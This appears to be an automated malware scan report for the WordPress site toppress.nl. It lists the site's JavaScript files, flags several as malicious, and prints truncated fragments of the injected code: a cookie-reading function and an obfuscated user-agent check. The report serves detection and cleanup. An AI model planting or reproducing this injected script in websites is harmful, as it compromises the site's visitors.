Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=toppress.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.toppress.nl/ | 200 OK Content-Length: 20137 Content-Type: text/html | clean |
http://www.toppress.nl/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94141 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://www.toppress.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8256 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.toppress.nl/wp-content/plugins/wpsc-support-tickets/js/wpsc-support-tickets.js?ver=3.8.4 | 200 OK Content-Length: 4745 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t } } function cancelAdd() { if(jQuery('.wpscst-table').length != 0) { jQuery("#wpscst_edit_div").fadeIn("slow"); jQuery("#wpscst-new").fadeIn("slow"); jQuery(".wpscst-table").fadeOut("slow"); jQuery("html, body").animate({scrollTop: jQuery("#wpscst_top_page").offset().top}, 2000); } } Antivirus reports:
| ||
http://www.toppress.nl/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.13.3.5ec5b4d | 200 OK Content-Length: 33434 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.toppress.nl/index.php?wpsc_user_dynamic_js=true&ver=3.8.13.3.5ec5b4d | 200 OK Content-Length: 1104 Content-Type: text/javascript | clean |
http://www.toppress.nl/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://www.toppress.nl/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.13.35ec5b4d | 200 OK Content-Length: 15728 Content-Type: application/javascript | clean |
http://www.toppress.nl/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 15500 Content-Type: application/javascript | clean |
http://www.toppress.nl/wp-includes/js/comment-reply.min.js?ver=3.8.4 | 200 OK Content-Length: 1813 Content-Type: application/javascript | clean |
http://www.toppress.nl/wp-content/plugins/wpsc-support-tickets/js/nicedit/nicEdit.js?ver=1.3.2 | 200 OK Content-Length: 31083 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.toppress.nl/wp-content/themes/toppress/framework/static/javascript/jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 25216 Content-Type: application/javascript | clean |
http://www.toppress.nl/wp-content/themes/toppress/js/general.js?ver=3.8.4 | 200 OK Content-Length: 6567 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.ajax({ type:"POST", url: tf_script.ajaxurl, data: 'action=tfuse_loveit_cookies_action&cookies=true&id='+id, dataType: "html" }); } } }); return false; }); var currentPageItem = jQuery('.sidebar .widget_pages .current_page_item'); }); Antivirus reports:
| ||
http://www.toppress.nl/wp-content/themes/toppress/js/jquery.easing.1.3.js?ver=1.3 | 200 OK Content-Length: 5880 Content-Type: application/javascript | clean |
http://www.toppress.nl/wp-content/themes/toppress/js/slides.min.jquery.js?ver=1.1.9 | 200 OK Content-Length: 7840 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: toppress.nl
Result:
GET / HTTP/1.1
Host: toppress.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: toppress.nl
Referer: http://www.google.com/search?q=toppress.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: toppress.nl
Referer: http://www.google.com/search?q=toppress.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.